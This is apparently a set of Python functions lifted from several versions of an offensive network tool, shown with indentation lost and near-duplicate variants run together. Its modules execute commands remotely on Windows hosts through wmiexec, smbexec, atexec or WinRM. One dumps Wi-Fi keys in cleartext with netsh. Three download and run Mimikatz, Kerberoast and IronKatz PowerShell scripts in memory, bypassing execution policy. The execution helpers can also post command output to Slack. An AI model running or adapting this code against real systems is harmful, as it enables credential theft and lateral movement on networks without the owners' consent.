def run(self, target, args, smb_con, loggers):
profiles = []
logger = loggers['console']
try:
if args.exec_method == 'wmiexec':
executioner = WMIEXEC(logger,
target,
args,
smb_con,
share_name=args.fileless_sharename)
elif args.exec_method == 'smbexec':
executioner = SMBEXEC(logger,
target,
args,
smb_con,
share_name=args.fileless_sharename)
# Quick n dirty error checking...
results = executioner.execute(
'netsh wlan show profiles').splitlines()
if len(results) <= 1:
logger.fail([
smb_con.host, smb_con.ip,
self.name.upper(), "{}: {}".format(self.name, results[0])
])
return
# List all profiles
for r in results:
if r.strip().startswith('All User Profile'):
try:
wifi = r.strip().split(":")[1]
profiles.append(wifi.lstrip().rstrip())
except:
pass
# Get clear text passwords
for p in profiles:
try:
for result in executioner.execute(
'netsh wlan show profile name=\"{}\" key=clear'.
format(p)).splitlines():
if result.split(":")[0].strip() in [
'SSID name', 'Authentication', 'Cipher',
'Key Content'
]:
logger.success([
smb_con.host, smb_con.ip,
self.name.upper(),
result.lstrip()
])
except Exception as e:
logger.debug([
smb_con.host, smb_con.ip,
self.name.upper(), "{}: {}".format(self.name, str(e))
])
except Exception as e:
logger.debug("{} Error: {}".format(self.name, str(e)))
def run(self, target, args, smb_con, loggers):
logger = loggers['console']
try:
if args.exec_method == 'wmiexec':
executioner = WMIEXEC(logger,
target,
args,
smb_con,
share_name=args.fileless_sharename)
elif args.exec_method == 'smbexec':
executioner = SMBEXEC(logger,
target,
args,
smb_con,
share_name=args.fileless_sharename)
for result in executioner.execute(
'powershell -exec bypass -noni -nop -W hidden -C "IEX (New-Object Net.WebClient).DownloadString(\'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1\');"'
).splitlines():
logger.info(
[smb_con.host, smb_con.ip,
self.name.upper(), result])
except Exception as e:
logger.debug("{} Error: {}".format(self.name, str(e)))
def run(self, target, args, smb_con, loggers, config_obj):
logger = loggers['console']
# Again super lazy way of powershell execution need to redo
try:
if args.exec_method == 'wmiexec':
executioner = WMIEXEC(logger,
target,
args,
smb_con,
share_name=args.fileless_sharename)
elif args.exec_method == 'smbexec':
executioner = SMBEXEC(logger,
target,
args,
smb_con,
share_name=args.fileless_sharename)
for result in executioner.execute(
'powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString(\'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1\');Invoke-kerberoast -OutputFormat Hashcat"'
).splitlines():
logger.info(
[smb_con.host, smb_con.ip,
self.name.upper(), result])
except Exception as e:
logger.debug("{} Error: {}".format(self.name, str(e)))
def run(self, target, args, smb_con, loggers):
logger = loggers['console']
# Again super lazy way of powershell execution need to redo
try:
if args.exec_method == 'wmiexec':
executioner = WMIEXEC(logger,
target,
args,
smb_con,
share_name=args.fileless_sharename)
elif args.exec_method == 'smbexec':
executioner = SMBEXEC(logger,
target,
args,
smb_con,
share_name=args.fileless_sharename)
for result in executioner.execute(
'powershell -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString(\'https://raw.githubusercontent.com/m8r0wn/OffensiveDLR/master/Invoke-IronKatz.ps1\');"'
).splitlines():
logger.info(
[smb_con.host, smb_con.ip,
self.name.upper(), result])
except Exception as e:
logger.debug("{} Error: {}".format(self.name, str(e)))
def code_execution(con, args, target, loggers, config_obj, cmd=None, return_data=False):
# Used as the primary execution function for ps_execute and all modules.
# Get payload to execute
if cmd != None:
payload = cmd
else:
payload = args.execute
# Implement Execution Method
if args.exec_method == 'wmiexec':
executioner = WMIEXEC(loggers['console'], target, args, con, share_name=args.fileless_sharename)
elif args.exec_method == 'smbexec':
executioner = SMBEXEC(loggers['console'], target, args, con, share_name=args.fileless_sharename)
# Log action to file
loggers[args.mode].info("Code Execution\t{}\t{}\\{}\t{}".format(target, args.domain, args.user, payload))
# Spawn thread for code execution timeout
timer = ExecutionTimeout(executioner, payload)
exe_thread = Thread(target=timer.execute)
exe_thread.start()
exe_thread.join(args.timeout+5)
# CMD Output
if args.slack and config_obj.SLACK_API and config_obj.SLACK_CHANNEL:
post_data = "[Host: {}]\t[User:{}]\t[Command:{}]\r\n{}".format(con.host, args.user, payload, timer.result)
slack_post(config_obj.SLACK_API, config_obj.SLACK_CHANNEL, post_data)
# Return to module not print
if return_data:
return timer.result
for line in timer.result.splitlines():
loggers['console'].info([con.host, con.ip, "CODE EXECUTION", line])
def code_execution(con, args, target, loggers, config_obj):
if args.exec_method == 'wmiexec':
executioner = WMIEXEC(loggers['console'],
target,
args,
con,
share_name=args.fileless_sharename)
elif args.exec_method == 'smbexec':
executioner = SMBEXEC(loggers['console'],
target,
args,
con,
share_name=args.fileless_sharename)
loggers[args.mode].info("Code Execution\t{}\t{}\\{}\t{}".format(
target, args.domain, args.user, args.execute))
timer = ExecutionTimeout(executioner, args.execute)
exe_thread = Thread(target=timer.execute)
exe_thread.start()
exe_thread.join(args.timeout + 3) # Account for sleep timer in exec class
if args.slack and config_obj.SLACK_API and config_obj.SLACK_CHANNEL:
post_data = "[Host: {}]\t[User:{}]\t[Command:{}]\r\n{}".format(
con.host, args.user, args.execute, timer.result)
slack_post(config_obj.SLACK_API, config_obj.SLACK_CHANNEL, post_data)
for line in timer.result.splitlines():
loggers['console'].info([con.host, con.ip, "CODE EXECUTION", line])
def cmd_execution(self, cmd):
self.filer.info("Command Execution\t{}\t{}\\{}\t{}".format(
self.host, self.smbcon.ip, self.username, cmd))
if self.exec_method.lower() == 'wmiexec':
self.executioner = WMIEXEC(self.logger,
self.host,
self.args,
self.smbcon,
share_name=self.sharename)
elif self.exec_method.lower() == 'smbexec':
self.executioner = SMBEXEC(self.logger,
self.host,
self.args,
self.smbcon,
share_name=self.sharename)
elif self.exec_method.lower() == 'atexec':
self.executioner = TSCHEXEC(self.logger,
self.host,
self.args,
self.smbcon,
share_name=self.sharename)
elif self.exec_method.lower() == 'winrm':
self.executioner = WINRM(self.logger, self.host, self.args,
self.smbcon)
self.output = self.executioner.execute(cmd).splitlines()
def code_execution(con,
args,
target,
loggers,
config_obj,
payload,
return_data=False):
# Implement Execution Method
if args.exec_method.lower() == 'wmiexec':
executioner = WMIEXEC(loggers['console'],
target,
args,
con,
share_name=args.fileless_sharename)
elif args.exec_method.lower() == 'smbexec':
executioner = SMBEXEC(loggers['console'],
target,
args,
con,
share_name=args.fileless_sharename)
elif args.exec_method.lower() == 'atexec':
executioner = TSCHEXEC(loggers['console'],
target,
args,
con,
share_name=args.fileless_sharename)
elif args.exec_method.lower() == 'winrm':
executioner = WINRM(loggers['console'],
target,
args,
con,
share_name=False)
elif args.exec_method.lower() == 'ssh':
executioner = con
# Log action to file
loggers[args.mode].info("Code Execution\t{}\t{}\\{}\t{}".format(
target, args.domain, args.user, payload))
# Spawn thread for code execution timeout
timer = ExecutionTimeout(executioner, payload)
exe_thread = Thread(target=timer.execute)
exe_thread.start()
exe_thread.join(args.timeout + 5)
exe_thread.running = False
# CMD Output
if args.slack and config_obj.SLACK_API and config_obj.SLACK_CHANNEL:
post_data = "[Host: {}]\t[User:{}]\t[Command:{}]\r\n{}".format(
con.host, args.user, payload, timer.result)
slack_post(config_obj.SLACK_API, config_obj.SLACK_CHANNEL, post_data)
# Return to module not print
if return_data:
return timer.result
for line in timer.result.splitlines():
loggers['console'].info(
[con.host, con.ip,
args.exec_method.upper(), line])